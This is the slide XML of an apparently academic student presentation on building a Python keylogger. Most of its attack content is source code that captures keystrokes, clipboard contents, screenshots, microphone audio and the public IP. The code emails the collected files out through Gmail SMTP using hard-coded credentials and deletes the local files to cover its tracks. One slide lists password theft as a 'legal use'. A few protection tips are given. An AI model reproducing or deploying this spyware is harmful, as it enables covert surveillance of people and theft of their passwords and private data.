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90" r:id="rId3"/>
    <p:sldId id="277" r:id="rId4"/>
    <p:sldId id="305" r:id="rId5"/>
    <p:sldId id="318" r:id="rId6"/>
    <p:sldId id="307" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="319" r:id="rId9"/>
    <p:sldId id="320" r:id="rId10"/>
    <p:sldId id="321" r:id="rId11"/>
    <p:sldId id="30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284" r:id="rId20"/>
    <p:sldId id="285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FD6B-74E7-478B-AF42-7A3A69C8B9A6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EB9F-01CB-44C3-86C4-1937800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8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F6B-32C0-40BA-97E8-F36C280C0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7BE42-52C4-448A-B4C2-EC2336EDD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5844-9E23-47F5-A62B-6F548E4D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EADC-E441-46F1-8306-4017511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8DE6-89B8-4D53-B51D-738C8BD6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995-F0D5-4A30-B2CF-DEE8452B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34A67-3269-4453-AB77-FC69EAC9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AAD9-1634-4AD2-9E12-7DE2707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CAE-ABCD-4FC1-93F9-D7C63B60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BF4-1BFC-41EC-A369-40730A1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11E6C-07F2-4DD1-B365-765A9D11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F40F-3A9D-4A42-A9AF-C3E20A34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F512-34DD-4910-9A10-AF62A08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ACA7-394B-4C78-9419-9F9F25A5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33FB-5090-4E4E-9810-80351552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FEE-D9A2-414A-9B37-F26E4CBA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8FC3-FB49-4139-9566-20C1DB23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A8F9-1C83-48C9-BB49-B5720FB6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6379-9C07-4BE5-975B-386C59AA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0957-0962-4290-86AA-9EDF10B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0602-89BD-46BA-99B5-686198EF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C7C1-EE7F-4E41-9422-C398028E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A0D5-B1B9-42EA-BBF9-FF228D2A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C4D8-A5B8-4B3C-BF3E-B4DB4C8A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3AE3-B933-41FD-90E1-A39C3CC8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F223-F705-4CB2-8FC3-30AEBE5B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B3BE-CA12-444E-976B-F056E1229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AEF1-5BF6-4726-A771-60909280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53C2-97AC-4AF0-94FD-2C153CE2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69D2-07B9-42BE-B351-ECFBA83A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A197-2D56-4A6F-AD5E-A34AD8D5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7A8E-3D85-41E4-A434-C67E6999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79E6-91F2-4873-A271-38521626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7067-79FA-4197-90F7-DE78ADA0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7E08-50F4-4468-B05A-C284C576D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ED1A5-C4FF-4990-AA26-39D8B8851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8E9C2-3BA4-492C-8411-B5851F51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CA47-7D0E-48AB-A714-270F296F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02129-CFDD-4ADE-96B4-CDA29FA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4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9E85-5B91-4DA7-824C-04686D6D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89B52-8549-4C74-9E45-373491AC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7DEB-1884-428E-8D72-0C777717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8002-3309-4B2E-98D8-4548B126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73197-CA40-41D7-9F27-6BD32B81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13A52-C66B-4374-A502-6081D67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2C36-7926-4C58-AF31-B3F368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FE4-9095-4981-ACDF-E4BAA94F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FFA1-7404-4070-B26A-5689CD52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ACB5-DA26-4CC3-A4C3-4FC3F5C1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FCF7-74EF-412F-9F87-7EA4467A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3F70-B0A5-449D-8AB4-32BE9C9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7221-F948-48A6-93D3-7536690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394-E72E-43D3-BC5B-8D27DC9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34770-0B5C-4793-8F8E-2D72B543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68D-C110-4546-9766-B2DBE68B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3DB4-4DC9-457D-9E3C-9A605267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8A04-55B8-454D-8E09-81C769A0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FA8A6-AB0E-4FBA-A2B1-81F7708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323A-8CC0-4DC0-9E30-9D2FAB6D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7328-4DD9-4795-9EB0-A91CBBE8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DFB9-5410-4AFF-A64F-E94AF0D8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C03C-2152-4298-97EA-BB5F60E13193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4E17-D9BD-48E3-B342-86BEA14C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3665-24EB-4C6E-9E8C-F72F770A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1/hi/sci/tech/1638795.stm" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Keystroke_logg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oonline.com/article/3678852/qualys-previews-totalcloud-flexscan-for-multicloud-security-management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1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IN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Surveillance using Keylogger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07776" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>8 November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/>
              <a:pPr/>
              <a:t>1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85999" y="3047999"/>
            <a:ext cx="8328213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Project Supervisor: Mr. T. Venketbabu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Name of the Student: Mohammed Arshad.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Register Number: 40110769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-144464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5446" y="436094"/>
            <a:ext cx="3106272" cy="5579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00" dirty="0" err="1"/>
              <a:t>number_of_iterations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> += 1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currentTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>time.time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stoppingTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>time.time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>() + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>time_iteration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0"/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b="1" dirty="0"/>
              <a:t># Clean up our tracks and delete files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>delete_files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>system_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>clipboard_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>screenshot_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>audio_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>for file in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>delete_files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>os.remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>file_merge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> + file)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8756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3" y="395206"/>
            <a:ext cx="8229600" cy="209227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Sample Snapshot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1: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Run the file keylogger.py and start clicking on any keys on the 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keyboard. The entered keys are shown in the output terminal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577CF-F61D-76AD-7022-DDF66E0E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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981228" y="2241178"/>
            <a:ext cx="7866530" cy="39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2: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After the successful compilation of the code, it will generate a file called key_log.txt. Then click on the file and it will show the generated output after keylogging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261BD-EC17-230F-C957-09D9CFF4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1689847" y="1539952"/>
            <a:ext cx="8812305" cy="46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3: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also generate a clipboard data which you have copied before. All of these contents are logged in a text file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DC3C2-80C1-4868-A613-8DD67275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>
          <a:xfrm>
            <a:off x="1689600" y="1299103"/>
            <a:ext cx="8812800" cy="46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4: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shows our system information data such as Public IP address and Private IP address, Host Name, Machine and System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265A-5E66-03BF-59A4-2F445C917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>
          <a:xfrm>
            <a:off x="1689600" y="1257300"/>
            <a:ext cx="8812800" cy="46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5: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took a screenshot of the system screen, when the keylogger starts executing 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544BC-9541-1498-CE2D-0C79D20D1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>
          <a:xfrm>
            <a:off x="1689600" y="1266825"/>
            <a:ext cx="8812800" cy="46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7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6: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records the audio of surroundings and save it in an audio.wav file. We can specify the timing of audio recording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D30F4-1BB6-217D-4804-EF155FD09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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689600" y="1276350"/>
            <a:ext cx="88128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7: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send the screenshot and keylog file to the given mail address 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0EAEF-C256-AD2E-4A9D-8C9345D1E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" b="5657"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1900519" y="1247775"/>
            <a:ext cx="8812800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395206"/>
            <a:ext cx="8491789" cy="20922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8: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Finally, all the generated files are listed below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sz="2200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6D625-B432-25E4-53DF-7C27EFB32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>
          <a:xfrm>
            <a:off x="1799692" y="1093234"/>
            <a:ext cx="8812800" cy="46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successfully developed keylogger project using python.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learned how to track the activities of keyboard.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this way, we can record every keystroke made by a user, especially in order to gain fraudulent access to passwords and other confidential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1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11 November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162235"/>
            <a:ext cx="10515600" cy="4637929"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Key logger record  keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Legitimate use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Monitor employee activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Legal uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Steal password , user name and other personal/corporate data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only dedicated protection can detect that a keylogger is being used for spy purposes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be conscious what installed in the computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use caution when snuffing the internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep your computer software update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40" y="228600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https://en.wikipedia.org/wiki/Keystroke_logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>J. Wurtzel, “Bugging your keyboard,” BBC News, Science/Nature; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://news.bbc.co.uk/1/hi/sci/tech/1638795.stm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, accessed Sept. 2006</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.csoonline.com/article/3678852/qualys-previews-totalcloud-flexscan-for-multicloud-security-management.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cormac Herley and Dinei Florencio, How to Login from an Internet Cafe Without Worrying About Keyloggers, Microsoft Research, Redmond, 2006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2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2940" y="228600"/>
            <a:ext cx="8692660" cy="67818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THANK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YOU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783729-38DE-4FE4-BDA3-D0EC00A599AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084730" y="384593"/>
            <a:ext cx="34783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27B9F-1D43-F187-AB0B-05457A9C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17" y="1025988"/>
            <a:ext cx="7472166" cy="52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40" y="2286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48770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Keyloggers or keystroke loggers are software programs or hardware devices that track the activities (keys pressed) of a keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>used to monitor user’s  activities and also used to retrieve data and forgotten URLs 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two types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Hardware Keylogger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Small electronic devices used to record the data between a keyboard interface and an I/O port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Software Keyloggers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>- It collect keystroke data, store them on disc or in remote locations and send them to the intruder who installed the keylogger</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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D74027"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D7402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01271" y="1659964"/>
            <a:ext cx="3683000" cy="4330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Clipboard logging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Screen logging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Voice logging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Site Monitoring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E-mail Reporting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Password Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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3259" y="1659964"/>
            <a:ext cx="5168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This software keylogger programs are made to work on the target operating system.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It collects the data which is travelling along the keyboard and the operating system.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Like it intercepts the keystroke events and then it will store them in a remote location.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 Which is used to capture the user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1B17-1547-466A-AF55-27AD20A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19" y="288457"/>
            <a:ext cx="7886700" cy="154688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System Architecture/ Ideation Map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702B-C066-449A-A2E2-31954040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103-9117-419E-9C48-6DBA6C5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76F6-CA8A-42BB-9178-52529FD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694106-DC02-4509-B62C-5EFEFB52A185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4693921" y="6400414"/>
            <a:ext cx="2804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Department of CSE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ECA8B7-6403-4762-AEA7-FC003D1BF13E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10029418" y="6414761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IN"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN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F96EEE91-27E0-4520-A861-166E990FD5A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2026919" y="6400414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en-US" dirty="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> November 2021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9D028D8-9020-4673-AD87-6F141FE54C0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2185170" y="348923"/>
            <a:ext cx="8531258" cy="106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1" y="1507600"/>
            <a:ext cx="5511800" cy="43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0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7389"/>
            <a:ext cx="27432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b="1" dirty="0"/>
              <a:t># Libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>from email.mime.multipart import MIMEMultipart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>from email.mime.text import MIMEText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email.mime.base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import MIMEBase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>from email import encoders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smtplib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socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>import platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>import win32clipboard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pynput.keyboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import Key, Listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>import time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scipy.io.wavfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import write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sounddevice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>sd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cryptography.fernet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> import Fernet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getpass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requests import get</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>from multiprocessing import Process, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>freeze_support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PIL import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>ImageGrab</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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736D525-61FB-2EAC-219A-26FC01A61E75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239000" y="1185953"/>
            <a:ext cx="3993776" cy="462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900" b="1" dirty="0"/>
              <a:t># email controls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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>send_email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(filename, attachment, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>toaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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fromaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>email_address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 = MIMEMultipart()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['From'] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>fromaddr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['To'] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>toaddr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['Subject'] = "Log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body = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>Body_of_the_mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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msg.attach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(MIMEText(body, 'plain'))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filename = filename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attachment = open(attachment, 'rb')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p = MIMEBase('application', 'octet-stream')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p.set_payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>attachment.read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty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encoders.encode_base64(p)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p.add_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>('Content-Disposition', "attachment; filename= %s" % filename)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msg.attach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>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s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>smtplib.SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>('smtp.gmail.com', 587)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s.starttls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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 err="1"/>
              <a:t>s.quit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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 err="1"/>
              <a:t>send_email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, 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keys_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>toaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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9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03332AD-C1E5-A941-C078-CA0785A550EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="1377389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/>
              <a:t># Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>keys_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "key_log.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>system_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "systeminfo.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>clipboard_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "clipboard.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>audio_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "audio.wav"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>screenshot_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "screenshot.png"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>keys_information_e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "e_key_log.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>system_information_e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "e_systeminfo.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>clipboard_information_e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "e_clipboard.txt"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 err="1"/>
              <a:t>microphone_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = 30</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>time_iteration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = 15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>number_of_iterations_end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = 3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 err="1"/>
              <a:t>email_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "completekeyloggerpt1@gmail.com"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>password = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>hilfbqrtzmscwfqk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>getpass.getuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>toaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "completekeyloggerpt1@gmail.com"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0" err="1"/>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> = "F:\\Project Files\\Python"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>extend = "\\"</a:t>
